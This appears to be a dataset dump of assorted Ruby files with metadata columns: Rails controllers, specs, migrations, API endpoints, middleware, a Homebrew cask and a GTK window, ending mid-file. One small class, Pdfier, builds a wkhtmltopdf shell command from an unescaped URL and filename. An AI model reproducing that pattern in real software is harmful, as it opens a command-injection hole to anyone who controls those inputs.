hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
21714fd4e71451c38d0d291712efc0edac8fadd0 | 126 | require 'rails_helper'
# Placeholder model spec generated by `rails g`; the single pending example
# should be replaced with real coverage for the Champion model.
RSpec.describe Champion, type: :model do
pending "add some examples to (or delete) #{__FILE__}"
end
| 21 | 56 | 0.746032 |
61f57195ac745b8f9258a43d4d4905c014c4ddd6 | 719 | require 'sageone_sdk/signature'
require 'active_support'
require "active_support/core_ext"
module SageoneSdk
module Middleware
# Faraday middleware that signs every outgoing request: it generates a fresh
# nonce and a request signature (computed by SageoneSdk::Signature from the
# HTTP method, URL, body, nonce, signing secret and access token) and attaches
# both as X-Nonce / X-Signature headers before passing the request downstream.
class Signature < Faraday::Middleware
# @param app [#call] next middleware/adapter in the Faraday stack
# @param access_token [String] OAuth access token fed into the signature
# @param signing_secret [String] secret used by SageoneSdk::Signature
def initialize(app, access_token, signing_secret)
super(app)
@access_token = access_token
@signing_secret = signing_secret
end
# Faraday entry point: mutates env's request headers, then delegates.
def call(env)
nonce = SageoneSdk::Signature.generate_nonce
signature = SageoneSdk::Signature.new(env.method, env.url, env.body, nonce, @signing_secret, @access_token)
env[:request_headers]['X-Nonce'] = nonce
env[:request_headers]['X-Signature'] = signature.to_s
@app.call(env)
end
end
end
end
| 24.793103 | 115 | 0.670376 |
339c453645f4e820ba6de97ddb87fdf4743cde0d | 107 | require 'billogram'
require 'minitest/autorun'
require 'logger'
# Empty Minitest suite for the billogram gem; add test_* methods here.
class TestBillogram < Minitest::Test
end
| 13.375 | 36 | 0.785047 |
33b92c876176e8056d353145eb7c1ce2be6feb75 | 444 | cask 'fsnotes' do
version '4.0.9'
sha256 '256723f712c68723b0f37cec606c9a0410cfa1d796035a2a2a7dcf6390ac091a'
# github.com/glushchenko/fsnotes was verified as official when first introduced to the cask
url "https://github.com/glushchenko/fsnotes/releases/download/#{version}/FSNotes_#{version}.zip"
appcast 'https://github.com/glushchenko/fsnotes/releases.atom'
name 'FSNotes'
homepage 'https://fsnot.es/'
app 'FSNotes.app'
end
| 34.153846 | 98 | 0.772523 |
87f912397ec19d825c3a8e4d5d8c30a0be1a413c | 2,266 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
# Run rails dev:cache to toggle caching.
if Rails.root.join('tmp', 'caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.action_controller.enable_fragment_cache_logging = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => "public, max-age=#{2.days.to_i}"
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Highlight code that triggered database queries in logs.
config.active_record.verbose_query_logs = true
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations.
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
config.hosts.clear
end
| 34.861538 | 87 | 0.763019 |
bffa6eaa7ad904171f3c624da5a2f8f33199b6b5 | 838 | class SessionsController < ApplicationController
# GET /login
def new
# Renders the login form only; the form posts params[:session] straight to
# #create, so no session object needs to be built here.
#@session = Session.new
end
# POST /login
# Authenticates the user from params[:session][:email]/[:password].
# Three outcomes: logged in (activated), blocked (not activated), or rejected.
def create
user = User.find_by(email: params[:session][:email])
if user && user.authenticate(params[:session][:password])
if user.activated?
# Success: establish the session, honor the remember-me checkbox, and
# send the user back to their originally requested page (or profile).
log_in user
params[:session][:remember_me] == '1' ? remember(user) : forget(user)
redirect_back_or user
else
# Correct password but account not yet activated: refuse login and
# point the user at the activation email.
message = "Account not activated. "
message += "Check your email for the activation link."
flash[:warning] = message
redirect_to root_url
end
else
# Failure: flash.now so the message does not persist past the re-render.
flash.now[:danger] = 'Invalid email/password combination'
render 'new'
end
end
# DELETE /logout
def destroy
# Guarded so a double-submitted logout (second tab) is a no-op.
log_out if logged_in?
redirect_to root_url
end
end | 23.277778 | 77 | 0.625298 |
33ad71fbef06f48943ed03f4f448ee87696e771e | 1,108 | require File.dirname(__FILE__) + '/../spec_helper'
# Access-control specs for CustomProjectsController#new: only managers of
# trusted projects (and admins) may reach the form; everyone else redirects.
describe CustomProjectsController, "new" do
let(:project) { Project.make! }
it "should not allow access to managers if project isn't trusted" do
expect( project ).not_to be_trusted
pu = ProjectUser.make!( project: project, role: "manager" )
sign_in pu.user
get :new, params: { project_id: project.id }
expect( response ).to be_redirect
end
it "should not allow access to non-managers" do
# NOTE(review): update_attributes is deprecated (removed in Rails 6.1);
# consider update! — confirm the Rails version this suite targets.
project.update_attributes( trusted: true )
u = User.make!
sign_in u
get :new, params: { project_id: project.id }
expect( response ).to be_redirect
end
it "should allow access by managers if project trusted" do
project.update_attributes( trusted: true)
pu = ProjectUser.make!( project: project, role: "manager" )
sign_in pu.user
get :new, params: { project_id: project.id }
expect( response ).to be_successful
end
it "should allow access by admins" do
u = make_admin
sign_in u
get :new, params: { project_id: project.id }
expect( response ).to be_successful
end
end
| 30.777778 | 70 | 0.684116 |
1d91beda1077cd301586fa48a352d0fa070720b8 | 7,956 | # encoding: UTF-8
# frozen_string_literal: true
# Admin Grape API for accounting adjustments: paginated listing with Ransack
# filtering, fetch by id, creation (with receiving-account validation), and
# state transitions (accept/reject) guarded by the receiver's balance.
module API
module V2
module Admin
class Adjustments < Grape::API
helpers ::API::V2::Admin::Helpers
namespace :adjustments do
desc 'Get all adjustments, result is paginated.',
is_array: true,
success: API::V2::Admin::Entities::Adjustment
params do
use :currency
use :date_picker
use :pagination
use :ordering
optional :state,
type: String,
# NOTE(review): message key 'admin.adjustment.invalid_action' for the
# :state param looks copy-pasted from the action endpoint below —
# confirm whether an 'invalid_state' key was intended.
values: { value: -> { Adjustment.aasm.states.map(&:name).map(&:to_s) }, message: 'admin.adjustment.invalid_action' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:state][:desc] }
optional :category,
type: String,
values: { value: -> { ::Adjustment::CATEGORIES }, message: 'admin.adjustment.invalid_category' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:category][:desc] }
end
get do
admin_authorize! :read, Adjustment
# Translate flat query params into a Ransack search: exact match on
# state/category, currency -> currency_id, plus the date range.
ransack_params = Helpers::RansackBuilder.new(params)
.eq(:state, :category)
.translate(currency: :currency_id)
.with_daterange
.build
search = Adjustment.ransack(ransack_params)
search.sorts = "#{params[:order_by]} #{params[:ordering]}"
present paginate(search.result), with: API::V2::Admin::Entities::Adjustment
end
desc 'Get adjustment by ID',
success: API::V2::Admin::Entities::Adjustment
params do
requires :id,
type: { value: Integer, message: 'account.adjustment.non_integer_id' },
# NOTE(review): "Adjsustment" typo in this user-facing desc string;
# left untouched here since it is runtime text, not a comment.
desc: 'Adjsustment Identifier in Database'
end
get ':id' do
admin_authorize! :read, Adjustment
present ::Adjustment.find(params[:id]), with: API::V2::Admin::Entities::Adjustment
end
desc 'Create new adjustment.',
success: API::V2::Admin::Entities::Adjustment
params do
requires :reason,
type: String,
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:reason][:desc] }
requires :description,
type: String,
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:description][:desc] }
requires :category,
type: String,
values: { value: -> { ::Adjustment::CATEGORIES }, message: 'admin.adjustment.invalid_category' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:category][:desc] }
requires :amount,
type: { value: BigDecimal, message: 'admin.adjustment.non_decimal_amount' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:amount][:desc] }
requires :currency_id,
type: String,
values: { value: -> { ::Currency.codes }, message: 'admin.adjustment.currency_doesnt_exist' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:currency][:desc] }
requires :asset_account_code,
type: { value: Integer, message: 'admin.adjustment.non_integer_asset_account_code' },
values: { value: -> { ::Operations::Account.where(type: :asset).pluck(:code) }, message: 'admin.adjustment.invalid_asset_account_code' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:asset_account_code][:desc] }
requires :receiving_account_code,
type: { value: Integer, message: 'admin.adjustment.non_integer_receiving_account_code' },
values: { value: -> { ::Operations::Account.where.not(type: :asset).pluck(:code) }, message: 'admin.adjustment.invalid_receiving_account_code' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:receiving_account_code][:desc] }
optional :receiving_member_uid,
type: String,
# NOTE(review): desc reuses the :receiving_account_code documentation —
# looks like a copy-paste slip; confirm a :receiving_member_uid entry exists.
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:receiving_account_code][:desc] }
end
post '/new' do
admin_authorize! :create, Adjustment
# Do not accept member_uid if account code is not Liability or Revenue
# Raise error if there is no :receiving_member_uid for Liability
operation_klass = ::Operations.klass_for(code: params[:receiving_account_code])
if operation_klass == ::Operations::Liability && params[:receiving_member_uid].blank?
error!({ errors: ['admin.adjustment.missing_receiving_member_uid'] }, 422)
elsif operation_klass == ::Operations::Expense && params[:receiving_member_uid].present?
error!({ errors: ['admin.adjustment.redundant_receiving_member_uid'] }, 422)
end
# Compose the receiving account number, then build the adjustment from the
# declared params minus the two fields folded into that account number.
receiving = ::Operations.build_account_number(currency_id: params[:currency_id],
account_code: params[:receiving_account_code],
member_uid: params[:receiving_member_uid])
adjustment = Adjustment.new(declared(params)
.except(:receiving_account_code, :receiving_member_uid)
.merge(receiving_account_number: receiving,
creator: current_user))
if adjustment.save
present adjustment, with: API::V2::Admin::Entities::Adjustment
status 201
else
body errors: adjustment.errors.full_messages
status 422
end
end
desc 'Accepts adjustment and creates operations or reject adjustment.',
success: API::V2::Admin::Entities::Adjustment
params do
requires :id,
type: { value: Integer, message: 'admin.adjustment.non_integer_id' },
desc: -> { API::V2::Admin::Entities::Adjustment.documentation[:id][:desc] }
requires :action,
type: String,
values: { value: -> { Adjustment.aasm.events.map(&:name).map(&:to_s) }, message: 'admin.adjustment.invalid_action' },
desc: "Adjustment action all available actions: #{Adjustment.aasm.events.map(&:name)}"
end
post '/action' do
admin_authorize! :update, Adjustment
adjustment = Adjustment.find(params[:id])
# For negative adjustments (debits), refuse the transition when the
# receiving member's account balance cannot cover the amount.
if adjustment.amount < 0
account_number_hash = ::Operations.split_account_number(account_number: adjustment.receiving_account_number)
member = Member.find_by(uid: account_number_hash[:member_uid])
balance = member.get_account(account_number_hash[:currency_id]).balance
if adjustment.amount.abs() > balance
error!({ errors: ['admin.adjustment.user_insufficient_balance'] }, 422)
end
end
# Drive the AASM event named by params[:action] only if it is permitted
# from the adjustment's current state.
if adjustment.public_send("may_#{params[:action]}?")
# TODO: Add behaviour in case of errors on action.
adjustment.public_send("#{params[:action]}!", validator: current_user)
present adjustment, with: API::V2::Admin::Entities::Adjustment
else
body errors: ["admin.adjustment.cannot_perform_#{params[:action]}_action"]
status 422
end
end
end
end
end
end
end
| 51 | 165 | 0.552288 |
f74a50f55874a5e555254c75436f44d697d292fe | 4,104 | # frozen_string_literal: true
# Blacklight search builder scoped to a press (publisher): restricts results to
# the press named in the URL (plus its child presses), optionally filters by the
# current actor's product access, and — for barpublishing only — expands the
# query so works whose contained files match are also returned.
class PressSearchBuilder < ::SearchBuilder
  self.default_processor_chain += [
    :filter_by_press,
    :filter_by_product_access,
    :show_works_or_works_that_contain_files
  ]

  # Adds a Solr filter query limiting hits to the URL press and its children.
  def filter_by_press(solr_parameters)
    solr_parameters[:fq] ||= []
    solr_parameters[:fq] << "{!terms f=press_sim}#{all_presses.map(&:downcase).join(',')}"
  end

  # Press looked up from the `press` URL param (memoized).
  def url_press
    @url_press ||= Press.find_by(subdomain: blacklight_params['press'])
  end

  # Subdomains of the URL press and all of its children, de-duplicated.
  def all_presses
    @all_presses ||= url_press.children.pluck(:subdomain).push(url_press.subdomain).uniq
  end

  # Narrows results by product access when the `user_access` URL param is set:
  # 'true' limits to products the current actor can read; 'oa' limits to the
  # imaginary product id -1 reserved for Open Access monographs.
  def filter_by_product_access(solr_parameters)
    # TODO: Not sure if we should have an admin over ride. Decide if we want this or not.
    # return if press_admin_role_override?
    # these URL params can be set by radio buttons in the UI "facet looking thing" seen in the wireframes
    if blacklight_params['user_access'] == 'true'
      solr_parameters[:fq] ||= []
      solr_parameters[:fq] << "{!terms f=products_lsim}#{all_product_ids_accessible_by_current_actor.join(',')}"
    elsif blacklight_params['user_access'] == 'oa'
      solr_parameters[:fq] ||= []
      solr_parameters[:fq] << "{!terms f=products_lsim}-1" # equivalent to solr_parameters[:fq] << "+open_access_tesim:yes"
    end
  end

  # show both works that match the query and works that contain files that match the query
  # see https://github.com/samvera/hyrax/blob/1477059ba7983bc3e1e3980d107d3ebc1b1f4af4/app/search_builders/hyrax/catalog_search_builder.rb#L10
  def show_works_or_works_that_contain_files(solr_parameters)
    return if blacklight_params[:q].blank? || blacklight_params['press'] != 'barpublishing'
    solr_parameters[:user_query] = blacklight_params[:q]
    solr_parameters[:q] = new_query
  end

  # barpublishing browse (no query) sorts by publication date (newest first);
  # everything else falls back to the configured default sort.
  def default_sort_field
    # This code is working at the moment (see HELIO-3429).
    # default_sort_field is a very ubiquitous term and is defined multiple times in multiple locations
    # blacklight_config.default_sort_field appears to morph between being a hash and being a method
    # In short this is a hack because I have no idea why it works.
    # Feel free to purge this code and find a better solution.
    case blacklight_params['press']
    when /^barpublishing$/i
      if blacklight_params['q'].present?
        blacklight_config.default_sort_field
      else
        blacklight_config.sort_fields['year desc'] # Sort by Publication Date (Newest First)
      end
    else
      blacklight_config.default_sort_field
    end
  end

  private

    # the {!lucene} gives us the OR syntax
    def new_query
      "{!lucene}#{internal_query(dismax_query)} #{internal_query(join_for_works_from_files)}"
    end

    # the _query_ allows for another parser (aka dismax)
    # (renamed from the misspelled `interal_query`; private, no external callers)
    def internal_query(query_value)
      "_query_:\"#{query_value}\""
    end

    # the {!dismax} causes the query to go against the query fields
    def dismax_query
      "{!dismax v=$user_query}"
    end

    # join from file id to work relationship solrized file_set_ids_ssim
    def join_for_works_from_files
      "{!join from=#{ActiveFedora.id_field} to=file_set_ids_ssim}#{dismax_query}"
    end

    # True for platform admins or press admins/editors. Currently unused —
    # referenced only by the commented-out override in filter_by_product_access.
    def press_admin_role_override?
      return true if current_user&.platform_admin?
      admin_roles = Role.where(user: current_user, resource_type: 'Press', resource_id: url_press.id, role: ['admin', 'editor']).map(&:role) & ['admin', 'editor']
      admin_roles.present?
    end

    # Product ids the current actor may read, always including -1 (Open Access)
    # and 0 (non-product monographs).
    def all_product_ids_accessible_by_current_actor
      # HELIO-3347 Indicate access levels on Publisher page
      #
      # -1 == Imaginary product ID for Open Access monographs.
      # 0 == Default product ID for all non-product Monographs a.k.a. Monographs that are not components.
      # allow_read_products == free to read products
      # actor_products == current actor's products
      #
      allow_read_products_ids = Sighrax.allow_read_products.pluck(:id)
      actor_products_ids = Sighrax.actor_products(scope.current_actor).pluck(:id)
      ([-1, 0] + allow_read_products_ids + actor_products_ids).uniq.sort
    end
end
| 39.461538 | 162 | 0.716862 |
87cb5cf505c535f5b6c63b585b01491fca510514 | 1,113 | require 'gtk3'
module Overcast
module Gui
# Modal, fixed-size GTK window showing summary details (file count, total
# size) for a directory item, centered over and transient for its parent.
class DirectoryDetailsWindow < Gtk::Window
# @param window_type [Gtk::WindowType] forwarded to Gtk::Window#initialize
# @param options [Hash] :directory_item (responds to #path, #files_count,
#   #size) and :parent (window to center over)
def initialize(window_type, options = {})
@directory_item = options[:directory_item]
parent = options[:parent]
super(window_type)
self.set_title("Directory Details [#{@directory_item.path}]")
self.resizable = false
self.border_width = 0
self.set_default_size(350, 200)
self.set_modal(true)
self.transient_for = parent
self.window_position = Gtk::WindowPosition::CENTER_ON_PARENT # or :center_on_parent
# Hide instead of destroying so the window object can be shown again.
self.signal_connect("destroy") { self.hide }
box = Gtk::Box.new(:vertical, 0)
box.spacing = 6
directory_files_count_label = Gtk::Label.new("# of Files: #{@directory_item.files_count}")
box.pack_start(directory_files_count_label, expand: false, fill: true, padding: 0)
directory_size_label = Gtk::Label.new("Directory Size: #{@directory_item.size}")
box.pack_start(directory_size_label, expand: false, fill: true, padding: 0)
self.add(box)
end
end
end
end | 38.37931 | 99 | 0.660377 |
61b00a0f5023b283714b9e8edf82eff1e52e4475 | 744 | require 'spec_helper'
describe 'cis_hardening::logaudit' do
on_supported_os.each do |os, os_facts|
# For each supported OS fact set: the catalog must contain the logaudit class
# and each of its subclasses, and must compile with all dependencies.
context "on #{os}" do
let(:facts) { os_facts }
# Check for default class
it {
is_expected.to contain_class('cis_hardening::logaudit')
}
# Check for all includes in the logaudit.pp
it {
is_expected.to contain_class('cis_hardening::logaudit::accounting')
}
it {
is_expected.to contain_class('cis_hardening::logaudit::logging')
}
it {
is_expected.to contain_class('cis_hardening::logaudit::logrotate')
}
# Ensure manifest compiles with all dependencies
it {
is_expected.to compile.with_all_deps
}
end
end
end | 24.8 | 75 | 0.63172 |
1a476ed5e97395e6e92bc6f0d96cd3e5c8974579 | 1,759 | module Pocketsphinx
module API
# Raw FFI bindings to libpocketsphinx. The :decoder/:configuration/:seg_iter
# typedefs are plain pointers named for readability; callers own the
# lifetimes of the underlying C objects.
module Pocketsphinx
extend FFI::Library
ffi_lib "libpocketsphinx"
typedef :pointer, :decoder
typedef :pointer, :configuration
# Allows expect(API::Pocketsphinx).to receive(:ps_init) in JRuby specs
def self.ps_init(*args)
ps_init_private(*args)
end
# Decoder lifecycle, decoding and search-mode functions.
attach_function :ps_init_private, :ps_init, [:configuration], :decoder
attach_function :ps_reinit, [:decoder, :configuration], :int
attach_function :ps_default_search_args, [:pointer], :void
attach_function :ps_args, [], :pointer
attach_function :ps_decode_raw, [:decoder, :pointer, :long], :int
attach_function :ps_process_raw, [:decoder, :pointer, :size_t, :int, :int], :int
attach_function :ps_start_utt, [:decoder], :int
attach_function :ps_end_utt, [:decoder], :int
attach_function :ps_get_in_speech, [:decoder], :uint8
attach_function :ps_get_hyp, [:decoder, :pointer], :string
attach_function :ps_get_prob, [:decoder], :int32
attach_function :ps_set_jsgf_string, [:decoder, :string, :string], :int
attach_function :ps_unset_search, [:decoder, :string], :int
attach_function :ps_get_search, [:decoder], :string
attach_function :ps_set_search, [:decoder, :string], :int
# Segment iterator: walk per-word segments of the last hypothesis.
typedef :pointer, :seg_iter
attach_function :ps_seg_iter, [:decoder, :pointer], :seg_iter
attach_function :ps_seg_next, [:seg_iter], :seg_iter
attach_function :ps_seg_word, [:seg_iter], :string
attach_function :ps_seg_frames, [:seg_iter, :pointer, :pointer], :void
attach_function :ps_seg_prob, [:seg_iter, :pointer, :pointer, :pointer], :int32
attach_function :ps_seg_free, [:seg_iter], :void
end
end
end
| 41.880952 | 86 | 0.688459 |
034c1a75334a8d94d3417e79e1c62c31cfaba285 | 1,111 | require 'sql_helper'
module Bmg
module Sql
class Processor
# Requalify#apply on an inner join must rename both range variables
# (t1/t2 -> t3/t4, given a Builder seeded at 2) and rewrite the join
# predicate's qualified identifiers to the new names.
describe Requalify, "on_inner_join" do
subject{ Requalify.new(Builder.new(2)).apply(expr) }
context 'with a predicate to requalify' do
let(:expr){
sexpr [ :inner_join,
[:table_as, [:table_name, :supplies], [:range_var_name, "t1"]],
[:table_as, [:table_name, :parts], [:range_var_name, "t2"]],
Predicate::Grammar.sexpr([:eq,
[:qualified_identifier, :t1, :pid],
[:qualified_identifier, :t2, :pid]
])
]
}
let(:expected){
sexpr [ :inner_join,
[:table_as, [:table_name, :supplies], [:range_var_name, "t3"]],
[:table_as, [:table_name, :parts], [:range_var_name, "t4"]],
Predicate::Grammar.sexpr([:eq,
[:qualified_identifier, :t3, :pid],
[:qualified_identifier, :t4, :pid]
])
]
}
it{ should eq(expected) }
end
end
end
end
end
| 28.487179 | 77 | 0.488749 |
62ca90478a384fe2d548fb9fbd50934ebc1c3964 | 1,906 | require 'spec_helper'
# Specs for EventLink: attribute/association surface plus the serialized
# `keyval` store and the `periods` array helper.
# NOTE(review): uses the old `.should` RSpec syntax throughout — fine if the
# suite enables it, but new examples should prefer expect().
describe EventLink do
#def valid_params
# {}
#end
describe "Object Attributes" do
before(:each) { @obj = EventLink.new }
specify { @obj.should respond_to(:event_id) }
specify { @obj.should respond_to(:data_link_id) }
end
describe "Associations" do
before(:each) { @obj = EventLink.new }
specify { @obj.should respond_to(:event) }
specify { @obj.should respond_to(:data_link) }
end
describe "store methods" do
# keyval must round-trip strings, integers and arrays through a save.
describe "#keyval" do
before(:each) { @obj = EventLink.new }
it "handles string values" do
@obj.keyval[:test] = "a"
@obj.save
@obj.keyval[:test].should == "a"
end
it "handles integer values" do
@obj.keyval[:test] = 1
@obj.save
@obj.keyval[:test].should == 1
end
it "handles array values" do
@obj.keyval[:test] = [1,2,3]
@obj.save
@obj.keyval[:test].should == [1,2,3]
end
end
# periods behaves like a persisted array: assignment, delete, and <<.
describe ".periods" do
before(:each) { @obj = EventLink.new }
it "works with method labels" do
@obj.periods = [1]
@obj.save
@obj.periods.should include 1
end
it "supports delete" do
@obj.periods = [1,2,3,4]
@obj.periods.delete 3
@obj.save
@obj.periods.should == [1,2,4]
end
it "supports concatenation" do
@obj.periods = [1,2,3,4]
@obj.periods << 5
@obj.save
@obj.periods.should == [1,2,3,4,5]
end
end
end
#describe "Validations" do
#end
#describe "Instance Methods" do
#end
end
# == Schema Information
#
# Table name: event_links
#
# id :integer not null, primary key
# event_id :integer
# data_link_id :integer
# created_at :datetime not null
# updated_at :datetime not null
#
| 22.690476 | 61 | 0.549318 |
01aa4770bad2ffbda79e1264611179559ea02d68 | 256 | class ColorpickerDeveloper < Cask
url 'http://download.panic.com/picker/developercolorpicker.zip'
homepage 'http://download.panic.com/picker/'
version 'latest'
no_checksum
colorpicker 'Developer Color Picker/DeveloperColorPicker.colorPicker'
end
| 32 | 71 | 0.796875 |
01084b5004ac8e3be7b6fb28ca815805b6a02e77 | 2,217 | class ProjectsController < ApplicationController
before_action :set_project, only: [:show, :edit, :update, :destroy]
# GET /projects
# GET /projects.json
def index
# Unscoped: every project, no pagination or filtering.
@projects = Project.all
end
# GET /projects/1
# GET /projects/1.json
def show
# @project is loaded by the set_project before_action; view renders it.
end
# GET /projects/new
def new
@project = Project.new
# ProjectForm wraps the model to drive the nested tasks/owner/contributors/tags form.
@project_form = ProjectForm.new(@project)
end
# GET /projects/1/edit
def edit
# @project loaded by set_project; wrapped in the form object for the view.
@project_form = ProjectForm.new(@project)
end
# POST /projects
# POST /projects.json
def create
@project = Project.new
@project_form = ProjectForm.new(@project)
# Copies permitted attributes onto the form object; nothing persists until #save.
@project_form.submit(project_params)
respond_to do |format|
if @project_form.save
format.html { redirect_to @project_form, notice: 'Project was successfully created.' }
else
# NOTE(review): the route comments advertise .json but only HTML is handled — confirm.
format.html { render :new }
end
end
end
# PATCH/PUT /projects/1
# PATCH/PUT /projects/1.json
def update
# @project loaded by set_project; the form object applies and saves the changes.
@project_form = ProjectForm.new(@project)
@project_form.submit(project_params)
respond_to do |format|
if @project_form.save
format.html { redirect_to @project_form, notice: 'Project was successfully updated.' }
else
format.html { render :edit }
end
end
end
# DELETE /projects/1
# DELETE /projects/1.json
def destroy
# @project loaded by set_project; destroy then return to the listing.
@project.destroy
respond_to do |format|
format.html { redirect_to projects_url, notice: 'Project was successfully destroyed.' }
end
end
private
# Use callbacks to share common setup or constraints between actions.
# Loads the project for member actions; raises RecordNotFound on a bad id.
def set_project
@project = Project.find(params[:id])
end
# Never trust parameters from the scary internet, only allow the white list through.
# Strong parameters: permits project fields plus nested attributes (with
# :id/:_destroy) for tasks, sub-tasks, owner, contributors, and tags.
def project_params
params.require(:project).permit(:name, :owner_id, tasks_attributes: [ :name, :description, :done, :id, :_destroy,
sub_tasks_attributes: [ :name, :description, :done, :id, :_destroy ] ],
owner_attributes: [ :name, :role, :description, :id, :_destroy ],
contributors_attributes: [ :name, :role, :description, :id, :_destroy ],
project_tags_attributes: [ :tag_id, :id, :_destroy, tag_attributes:
[ :name, :id, :_destroy ] ])
end
end
| 26.082353 | 119 | 0.662156 |
e800d8357c153fd9e5926e1634c6955ff89ad5fa | 811 | class CreateBranchPriorityCharts < ActiveRecord::Migration
# Creates the denormalized daily chart table (one row per branch/priority/day)
# with composite indexes for date and (priority, branch) lookups.
def self.up
create_table :branch_priority_charts do |t|
t.integer "branch_id"
t.integer "priority_id"
t.integer "date_year"
t.integer "date_month"
t.integer "date_day"
t.integer "position"
t.integer "up_count"
t.integer "down_count"
t.integer "volume_count"
t.float "change_percent", :default => 0.0
t.integer "change", :default => 0
t.datetime "created_at"
end
add_index :branch_priority_charts, ["date_year", "date_month", "date_day"], :name => "branch_pcharts_date"
add_index :branch_priority_charts, ["priority_id", "branch_id"], :name => "branch_pcharts_id"
end
# Reverses self.up; indexes are dropped together with the table.
def self.down
drop_table :branch_priority_charts
end
end
| 30.037037 | 110 | 0.657213 |
ed34c92c701f991ccf54d1aa5fd9035255de5a94 | 277 | class Pdfier
# @param url [String] page to render to PDF
# @param filename [String] output name, with or without a ".pdf" extension
def initialize(url, filename)
@url = url
@filename = filename
end
# Shells out to wkhtmltopdf, writing ./files/<name>.pdf, and returns the name.
# SECURITY(review): @url and the filename are interpolated into a shell
# command unescaped — shell injection if either comes from untrusted input;
# consider Shellwords.escape or system() with an argument list.
def save_as_pdf
`wkhtmltopdf #{@url} ./files/#{get_filename}`
get_filename
end
private
# Returns @filename, appending ".pdf" unless it already ends with it.
# Uses \z (true end of string) rather than $, which would also match before a
# trailing newline; match? avoids allocating MatchData.
def get_filename
return @filename if @filename.match?(/\.pdf\z/)
"#{@filename}.pdf"
end
end | 15.388889 | 47 | 0.689531 |
5d94090c68723215fe5604a852c9c46cb9b69cc2 | 1,534 | require "set"
module ActiveRecord
module SqlAnalyzer
# Consumes analyzer events from an in-process queue on a lazily started
# background thread: redacts each call's backtrace and SQL via the
# configured procs, then filters and logs the event with the logger
# carried inside the event hash itself.
class BackgroundProcessor
def initialize
@queue = Queue.new
end
# Enqueues an event hash, making sure the consumer thread is alive first.
def <<(event)
processor_thread
@queue << event
end
private
# Guards thread (re)creation; shared by all processor instances.
MUTEX = Mutex.new
# Blocks on the queue for one event, rewrites its :calls entries through
# the configured redaction procs, then filter + log via event[:logger].
def process_queue
event = @queue.pop
event[:calls] = event[:calls].map do |call|
{
caller: SqlAnalyzer.config[:backtrace_filter_proc].call(call[:caller]),
sql: SqlAnalyzer.config[:sql_redactor_complex_proc].call(call[:sql].dup),
duration: call[:duration]
}
end
logger = event.delete(:logger)
logger.filter_event(event)
logger.log(event)
end
# Lazily starts the consumer loop with double-checked locking. If the
# loop dies from an exception it is logged and the thread exits; the
# next #<< call starts a fresh thread.
def processor_thread
# Avoid grabbing a mutex unless we really need to
return if @thread && @thread.alive?
MUTEX.synchronize do
# Double check to avoid a race condition
return if @thread && @thread.alive?
@thread = Thread.new do
Rails.logger.info "[SQL-Analyzer] Starting background query thread id #{Thread.current.object_id} in pid #{Process.pid}"
begin
loop do
process_queue
end
rescue => ex
Rails.logger.warn "[SQL-Analyzer] Exception in thread #{Thread.current.object_id}: #{ex.class}, #{ex.message}"
Rails.logger.warn "[SQL-Analyzer] #{ex.backtrace.join(", ")}"
end
end
end
end
end
end
end
| 25.566667 | 132 | 0.562581 |
38ed20fb4b77586db4bd427fae0df0a4443fe5ed | 378 | # frozen_string_literal: true
# Creates the organizations table with a UUID primary key, API/OAuth
# credential columns, branding colors, and a subdomain.
class CreateOrganizations < ActiveRecord::Migration[5.0]
def change
create_table :organizations, id: :uuid do |t|
t.string :name
t.string :api_key
t.string :client_id
t.string :client_secret
t.string :primary_color
t.string :secondary_color
t.string :subdomain
t.timestamps
end
end
end
| 21 | 56 | 0.671958 |
381182b4c737e5d7cea0d801f320f3235bf88a29 | 413 | # Be sure to restart your server when you modify this file.
Library::Application.config.session_store :cookie_store, key: '_library_session'
# Use the database for sessions instead of the cookie-based default,
# which shouldn't be used to store highly confidential information
# (create the session table with "rails generate session_migration")
# Library::Application.config.session_store :active_record_store
| 45.888889 | 80 | 0.811138 |
d51b866a47127733b1328179eeaac76b7529a5c9 | 1,381 | class Mailboxer::Message < Mailboxer::Notification
attr_accessible :attachment if Mailboxer.protected_attributes?
# Messages live in the shared notifications table (single-table inheritance).
self.table_name = :mailboxer_notifications
belongs_to :conversation, :class_name => "Mailboxer::Conversation", :validate => true, :autosave => true
validates_presence_of :sender
# Class-wide hook invoked after a successful deliver; set via .on_deliver.
class_attribute :on_deliver_callback
protected :on_deliver_callback
# Messages belonging to a given conversation.
scope :conversation, lambda { |conversation|
where(:conversation_id => conversation.id)
}
mount_uploader :attachment, AttachmentUploader
class << self
# Registers the callback object invoked after each delivery.
def on_deliver(callback_method)
self.on_deliver_callback = callback_method
end
end
#Delivers a Message. USE NOT RECOMENDED.
#Use Mailboxer::Models::Message.send_message instead.
# @param reply [Boolean] when true, touches the conversation's timestamp
